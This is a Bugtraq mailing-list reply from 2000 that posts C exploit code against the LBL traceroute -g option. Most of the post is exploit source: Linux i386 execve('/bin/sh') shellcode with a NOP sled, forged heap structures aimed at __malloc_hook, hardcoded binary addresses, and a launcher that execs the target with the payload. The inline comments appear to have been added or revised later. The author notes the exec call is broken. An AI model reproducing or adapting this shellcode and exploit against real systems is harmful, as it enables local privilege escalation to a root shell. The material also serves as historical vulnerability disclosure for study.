[17065] in bugtraq


Re: Traceroute exploit + story

daemon@ATHENA.MIT.EDU (Harrington, Perry)
Thu Oct 5 18:36:46 2000

Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id:  <200010051937.MAA08092@eris>
Date:         Thu, 5 Oct 2000 12:37:10 -0700
Reply-To: pedward@WEBCOM.COM
From: "Harrington, Perry" <pedward@WEBCOM.COM>
X-To:         W.H.J.Pinckaers@cpedu.rug.nl
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <C18A9D0707@cpedu1.cpedu.rug.nl> from "W.H.J.Pinckaers" at Oct
              05, 2000 04:09:20 PM

Hmm, this looks a lot like my post on the subject.  The exploit
I was working on was a lot simpler.  It seems that some person
chose to ignore my post, which further explained my work, and
discard it (ahem).

--Perry

PS: the exec call in the code below is broken; otherwise it might work.

This is the code I had started on:

#include <stdio.h>
#include <unistd.h>
#include <string.h>

/*
 * Linux/i386 execve("/bin/sh") shellcode in the jmp/call style: the jmp at
 * the top lands on the call at GETADDR, which pushes the address of the
 * ".bin.sh" bytes that follow it and transfers back to RUNPROG.  RUNPROG pops
 * that address into %esi, patches the string and the two pointers execve
 * needs in place, and issues the syscall.
 *
 * Observations from the encoded bytes:
 *   - 66 payload bytes; sizeof(code) == 67 with the implicit terminator.
 *   - No 0x00 byte anywhere, so the payload survives C-string copies.
 *   - The string is stored as ".bin.sh"; RUNPROG bumps bytes 0 and 4 from
 *     '.' (0x2e) to '/' (0x2f) at run time, presumably because a literal
 *     slash must not appear in the payload as delivered -- TODO confirm why.
 *   - RUNPROG stores argv[0] at string+8 and NULL at string+12, i.e. 8..15
 *     bytes past the end of this array: wherever the payload is placed there
 *     must be writable slack after it.
 */
char code[] =
   "\xeb\x34"              /* jmp    GETADDR   (+0x34: 2+52 = offset 54)   */
   "\x90\x90\x90\x90"      /* nop nop nop nop                               */
   "\x90\x90\x90\x90"      /* nop nop nop nop   16-byte sled, offsets 2..17 */
   "\x90\x90\x90\x90"      /* nop nop nop nop                               */
   "\x90\x90\x90\x90"      /* nop nop nop nop                               */
			   /* RUNPROG: (offset 18) entered via the call    */
			   /* below, so the string address is on the stack  */
   "\x5e"                  /* popl   %esi            %esi = &".bin.sh"     */
   "\x89\x76\x08"          /* movl   %esi,0x8(%esi)  argv[0] = string       */
   "\x31\xc0"              /* xorl   %eax,%eax       %eax = 0               */
   "\x88\x46\x07"          /* movb   %al,0x7(%esi)   NUL-terminate string   */
   "\x89\x46\x0c"          /* movl   %eax,0xc(%esi)  argv[1] = NULL         */
   "\xfe\x06"              /* incb   (%esi)          '.' -> '/'  (byte 0)   */
   "\xfe\x46\x04"          /* incb   0x4(%esi)       '.' -> '/'  (byte 4)   */
   "\xb0\x0b"              /* movb   $0xb,%al        syscall 11 = execve    */
   "\x89\xf3"              /* movl   %esi,%ebx       path = "/bin/sh"       */
   "\x8d\x4e\x08"          /* leal   0x8(%esi),%ecx  argv = string+8        */
   "\x8d\x56\x0c"          /* leal   0xc(%esi),%edx  envp = string+12       */
   "\xcd\x80"              /* int    $0x80           execve(...)            */
   "\x31\xdb"              /* xorl   %ebx,%ebx       only reached if execve */
   "\x89\xd8"              /* movl   %ebx,%eax       failed: %eax = 0       */
   "\x40"                  /* incl   %eax            %eax = 1 = exit        */
   "\xcd\x80"              /* int    $0x80           exit(0)                */
			   /* GETADDR: (offset 54)                          */
   "\xe8\xd7\xff\xff\xff"  /* call   RUNPROG   rel32 -41: 59-41 = 18       */
   ".bin.sh";              /* Program to run, offset 59; patched to /bin/sh */

/* glibc's malloc hook variable; main() below reads its current value.
 * NOTE(review): __malloc_hook was removed from glibc's exported symbols in
 * 2.34, so this only links against the older glibc the post targets. */
extern void *__malloc_hook;

/*
 * One 16-byte slice of the payload: two ints followed by two pointers.
 * The memcpy(..., 16) calls in main() assume an ILP32 layout; on an LP64
 * build the struct is 24 bytes and those copies would drop q entirely.
 * Used twice by main(): at the start of the buffer as
 * {ASCII "1.1.", ASCII "1.1 ", hook value, us+16} and at offset 240 as
 * {filler, 0xFFFFFF01, 0, 0}.
 */
typedef struct glue {
	int	a;	/* first 32-bit word */
	int	b;	/* second 32-bit word */
	void	*p;	/* third word, written as a pointer */
	void	*q;	/* fourth word, written as a pointer */
} glue;

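/*
 * Debug aid: dump a NUL-terminated buffer to stdout, printing bytes in the
 * visible ASCII range 33..126 as themselves and every other byte (space,
 * control characters, 0x7f and anything >= 0x80) as a single space.
 * Despite its name it prints no hex.  Output is exactly strlen(p) characters
 * with no trailing newline.  Not called by main() in this file.
 *
 * p: NUL-terminated string; must not be NULL.
 */
void print_hex(const char *p)
{
	/* Walk the bytes as unsigned so values >= 0x80 are classified the same
	 * way whether plain char is signed or unsigned on the host. */
	const unsigned char *q = (const unsigned char *)p;

	for (; *q != '\0'; q++) {
		putchar((*q > 32 && *q < 127) ? (int)*q : ' ');
	}
}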

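/*
 * Build the payload handed to traceroute's -g option and exec the target.
 *
 * Layout of buf (256 bytes used, NUL at buf[255]):
 *   [0..15]    glue: "1.1.1.1 " (ipa, ipb as little-endian ASCII), the
 *              current value of __malloc_hook, then us+16
 *   [16..81]   the 66 shellcode bytes from code[] (no NUL bytes inside)
 *   [82..239]  0x47 filler
 *   [240..255] glue: dummy, 0xFFFFFF01, then eight zero bytes -- the C string
 *              traceroute receives therefore ends at offset 248
 *
 * usage and us are absolute addresses from one particular traceroute binary
 * and must be re-derived for any other build.  A copy of the payload, as the
 * target will see it, is written to /tmp/code for inspection.
 *
 * Changes from the posted version: fopen/fclose/execl failures are reported
 * instead of ignored, pointers are printed with %p, and the printf of an
 * uninitialised 4 KiB array (undefined behaviour, unrelated to the payload)
 * is gone.  The execl arguments are left exactly as posted.
 *
 * Returns 1 if the payload file or the exec fails; does not return on success.
 */
int main(void)
{
	/* "1.1.1.1 " as two 32-bit words; the byte order assumes an LE host */
	int	ipa=0x2E312E31;
	int	ipb=0x20312E31;
	int	oh=0x00000000;
	int	dummy=0x43434343;
	/* NOTE(review): this reads the hook's current *value* (whatever glibc
	 * has installed), not &__malloc_hook.  Confirm which one the overwrite
	 * is meant to carry before relying on it. */
	void	*mh=(void *)__malloc_hook;
	/* Absolute addresses from one specific traceroute binary;
	 * 0x804cd80 was the author's earlier candidate for us. */
	void	*usage=(void *)0x804a858;
	void	*us=(void *)0x804cd7a;
	char	buf[260];
	const char *prog="/tmp/traceroute";
	glue	temp;
	FILE	*out;

	printf ("malloc_hook %p code %p\n", mh, usage);

	/* 0x47 filler with the terminator at 255; bytes 256..259 are never read */
	memset(buf, 0x47, 256);
	buf[255]='\0';
	printf ("buf: %s\n", buf);

	/* bytes 0..15: fake gateway prefix, hook value, us+16 */
	temp.a=ipa;
	temp.b=ipb;
	temp.p=mh;
	temp.q=(char *)us+16;
	memcpy(buf, &temp, 16);
	printf ("buf: %s\n", buf);

	/* bytes 240..255: filler word, 0xFFFFFF01, then eight zero bytes */
	temp.a=dummy;
	temp.b=(int)0xFFFFFF01;
	temp.p=(void *)oh;
	temp.q=(void *)oh;

	/* bytes 16..81: the shellcode.  code[] contains no NUL, so copying
	 * sizeof(code)-1 bytes moves exactly the payload (the posted strncpy
	 * did the same thing but read like a string copy). */
	printf("code(%zu)\n", sizeof(code));
	memcpy(buf+16, code, sizeof(code) -1);
	memcpy(buf+240, &temp, 0x10);
	printf ("buf: %s\n", buf);
	buf[255]='\0';

	/* Keep a copy for inspection.  fputs stops at the first NUL, i.e. it
	 * records exactly the bytes execl passes as the -g argument. */
	out=fopen("/tmp/code","w");
	if (out == NULL) {
		perror("fopen /tmp/code");
		return 1;
	}
	fputs(buf,out);
	if (fclose(out) != 0) {
		perror("fclose /tmp/code");
		return 1;
	}

	/* Left as posted -- the author's PS says this exec is broken: prog is
	 * passed twice (argv[0] and argv[1]) and the second gateway arrives as
	 * the single element "-g 1" rather than "-g", "1". */
	execl(prog,prog,prog,"-g",buf,"-g 1","127.0.0.1", NULL);

	/* execl only returns on failure */
	perror("execl");
	return 1;
}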

>
>             LBL traceroute exploit.
>
>          By Dvorak, Synnergy Networks
>                 www.synnergy.net
>

--
Perry Harrington                 Director of                   zelur xuniL  ()
perry@webcom.com             System Architecture               Think Blue.  /\
